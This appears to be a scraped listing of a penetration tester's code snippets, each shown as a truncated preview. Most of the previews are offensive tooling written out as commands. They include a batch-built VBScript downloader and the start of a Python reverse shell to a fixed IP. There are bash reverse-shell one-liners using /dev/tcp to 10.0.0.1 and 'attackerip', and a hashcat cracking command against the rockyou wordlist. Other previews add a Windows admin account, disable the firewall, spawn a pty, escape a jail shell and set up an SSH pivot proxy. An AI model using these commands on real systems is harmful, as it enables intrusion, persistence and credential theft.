View pub.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland |
View pub.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland |
View pub.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland |
View wget_vbs
echo strUrl = WScript.Arguments.Item(0) > wget.vbs | |
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs | |
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs | |
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs | |
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs | |
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs | |
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs | |
echo Err.Clear >> wget.vbs | |
echo Set http = Nothing >> wget.vbs | |
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs |
View simple_py_shell
#!/usr/bin/python | |
# imports here | |
# Copyright 2012 TrustedSec, LLC. All rights reserved. | |
# | |
# This piece of software code is licensed under the FreeBSD license.. | |
# | |
# Visit http://www.freebsd.org/copyright/freebsd-license.html for more information. | |
import socket,subprocess | |
HOST = '192.168.12.45' # The remote host | |
PORT = 443 # The same port as used by the server |
View password_cracking
#cracks md5(unix) hash, places found passwords in found.txt, removes them from the hasth list and uses the rockyou wordlist | |
hashcat -m 500 -a 0 -o found.txt --remove hashes.txt /usr/share/wordlist/rockyou.txt |
View tricks
#get a pty through python | |
python -c 'import pty; pty.spawn("/bin/bash");' | |
#grab the user agent from the http header on port 10443 | |
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443 | |
#base64 decode a string | |
echo STRINGTODECODE | base64 --decode | |
#escape jail shell |
View windows_crap
#add a user | |
net user ryan mwcb /add | |
#add user to local administrators | |
net localgroup administrators /add ryan | |
#remove firewall | |
netsh firewall set opmode disable | |
#enabled remote desktop |
View ssh_tricks
##SOCKS Proxy## | |
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1): | |
#Command line: | |
ssh -D 127.0.0.1:1080 10.0.0.1 | |
#~/.ssh/config: | |
Host 10.0.0.1 | |
DynamicForward 127.0.0.1:1080 | |
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1: |
View reverse_shells
#bash | |
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
#bash alt | |
exec /bin/bash 0&0 2>&0 | |
#bash alt 2 | |
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 | |
#bash alt 3 |
NewerOlder